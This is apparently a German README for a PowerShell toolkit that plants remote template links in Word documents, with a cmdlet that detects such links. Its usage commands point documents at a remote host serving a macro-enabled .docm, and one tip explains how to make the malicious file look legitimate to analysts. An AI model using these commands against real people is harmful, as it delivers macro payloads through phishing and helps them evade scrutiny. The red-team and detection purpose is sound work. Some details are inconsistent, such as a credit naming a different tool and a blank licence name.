
PowerShell-Toolkit für Remote-Template-Injection-Angriffe und -Abwehr. Fügt bösartige Links in Office Word-Dokumente für Phishing ein, mit Erkennungsmodulen für Blue Teams.
Remote Template Injection Toolkit
RTI-Toolkit ist ein Open-Source-PowerShell-Toolkit für Remote Template Injection-Angriffe. Dieses Toolkit enthält ein PowerShell-Skript namens PS-Templator.ps1, das sowohl aus angreifender als auch aus defensiver Perspektive verwendet werden kann.
Die folgende Tabelle stellt die Hauptmodule (Cmdlets) von PS-Templator.ps1 dar:
| Cmdlet | Beschreibung | Perspektive |
|---|---|---|
| Invoke-Template | Implementiert Remote Template Links in Standard-Office-Word-Vorlagen | Angreifend |
| Invoke-Regular | Implementiert Remote Template Links in regulären Office-Word-Dokumenten ohne Vorlage | Angreifend |
| Invoke-Identify | Identifiziert Remote Template Links in Office-Word-DOCX-Dokumenten mit/ohne Vorlage | Defensiv |
⚠️ PS-Templator.ps1 unterstützt nur DOCX-Dateien.
ℹ️ Dieses Tool wird vom National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD) in CVE-2025-65318 und CVE-2025-65319 referenziert.
Dieses Tool ist lizenziert unter der .
Besonderer Dank geht an meine Freunde @Papadope9 und Stavros Gkounis (a.k.a purpl3ph03n1x), die während der Beta-Testphase des Tools unschätzbare Hilfe geleistet haben.
Dieses Tool wurde während eines iCAST Red Teaming Assessments mit @S1ckB0y1337 vor einigen Jahren inspiriert.
Supernova wurde mit ❤️ von @nickvourd erstellt.
Remote Template Injection (RTI) im Kontext von Microsoft Office bezieht sich auf eine spezifische Art von Sicherheitslücke, die durch bösartige Vorlagen in Office-Dokumenten (z. B. Word, Excel, PowerPoint) ausgenutzt werden kann.
Zum Beispiel wird der Inhalt in einer DOCX-Datei im XML-Format im Archiv gespeichert, und einige dieser XML-Dateien können auf externe Ressourcen oder Vorlagen verweisen. Angreifer können diese XML-Dateien manipulieren, um bösartige Links oder Inhalte einzufügen, die potenziell Sicherheitslücken ausnutzen oder Benutzer täuschen können.
Dies ist ein makrobasierter Angriff.
Um PS-Templator.ps1 als Modul in den Speicher zu laden, führen Sie den folgenden Befehl aus:
Import-Module .\PS-Templator.ps1
ℹ️ PS-Templator.ps1 funktioniert ohne die Notwendigkeit, zusätzliche Abhängigkeiten zu installieren.
ℹ️ PS-Templator.ps1 funktioniert als PowerShell-Modul.
ℹ️ PS-Templator.ps1 wurde auf einem Windows 10-Rechner mit Office 2019 Professional Plus getestet.
Invoke-Template ist ein Cmdlet, das Remote Template Links in Standard-Office-Word-Vorlagen implementiert.
Angenommen, Sie haben eine Standard-Word-Vorlage, wie zum Beispiel diese:

Gespeichert als z. B. 'Name.docx':

Wenn Sie das Cmdlet Invoke-Template verwenden, können Sie einen bösartigen Link in diese DOCX-Datei einfügen:
⚠️ Bevor Sie Invoke-Template ausführen, stellen Sie bitte sicher, dass Sie das Dokument gespeichert und geschlossen haben (seinen Prozess beendet haben).
Invoke-Template -InputDoc Name.docx -Link "https://192.168.1.3:8080/Doc1.docm" -Output C:\Users\User\Desktop\LegitDocument.docx
Ergebnis:

Wie Sie sehen können, erstellt das Invoke-Template-Modul ein Backup des Originaldokuments und gibt den vollständigen Pfad zum bösartigen Dokument an.
Aus Debugging-Perspektive: Wenn Sie die bösartige DOCX-Datei in ein ZIP-Archiv konvertieren und in /word/_rels/settings.xml.rels gehen, können Sie den bösartigen Link sehen:

Invoke-Regular ist ein Cmdlet, das Remote Template Links in regulären Office-Word-Dokumenten ohne Vorlagen implementiert.
Angenommen, Sie haben ein Standard-Word-Dokument ohne Vorlage, wie dieses:

Gespeichert als z. B. 'Doc1.docx':

Wenn Sie das Cmdlet Invoke-Regular verwenden, können Sie einen bösartigen Link in diese DOCX-Datei einfügen:
⚠️ Bevor Sie Invoke-Regular ausführen, stellen Sie bitte sicher, dass Sie das Dokument gespeichert und geschlossen haben (seinen Prozess beendet haben).
Invoke-Regular -InputDoc C:\Users\User\Desktop\Doc1.docx -Link "http://192.168.1.3:8080/Doc1.docm" -Output Nikos2.docx
Ergebnis:

Wie Sie sehen können, erstellt das Invoke-Regular-Modul ein Backup des Originaldokuments und gibt den vollständigen Pfad zum bösartigen Dokument an.
Aus Debugging-Perspektive: Wenn Sie die bösartige DOCX-Datei in ein ZIP-Archiv konvertieren und in /word/_rels/settings.xml.rels gehen, können Sie den bösartigen Link sehen:

Aus OPSEC-Perspektive können Sie -TemplateName in Verbindung mit dem Modul Invoke-Regular verwenden. Dadurch wirkt Ihr bösartiges Dokument legitimer, falls jemand versucht, es zu analysieren.
Hier ist ein Beispiel:
Invoke-Regular -InputDoc C:\Users\User\Desktop\Doc1.docx -Link "http://192.168.1.3:8080/Doc1.docm" -Output Legittemplate.dotx
Ergebnis:

Aus Debugging-Perspektive: Wenn Sie die bösartige DOCX-Datei in ein ZIP-Archiv konvertieren und in /docProps/app.xml gehen, können Sie den gefälschten Vorlagennamen sehen:

Invoke-identify ist ein Cmdlet, das Remote Template Links in Office-Word-DOCX-Dokumenten mit/ohne Vorlage identifiziert.
Angenommen, Sie haben ein bösartiges Word-Dokument:
Invoke-Identify -InputDoc LegitDocument.docx -Output C:\Users\User\Desktop\output.txt
Ergebnis:

Angenommen, Sie haben ein nicht bösartiges Word-Dokument:
Invoke-Identify -InputDoc Name.docx -Output C:\Users\User\Desktop\output2.txt
Ergebnis:
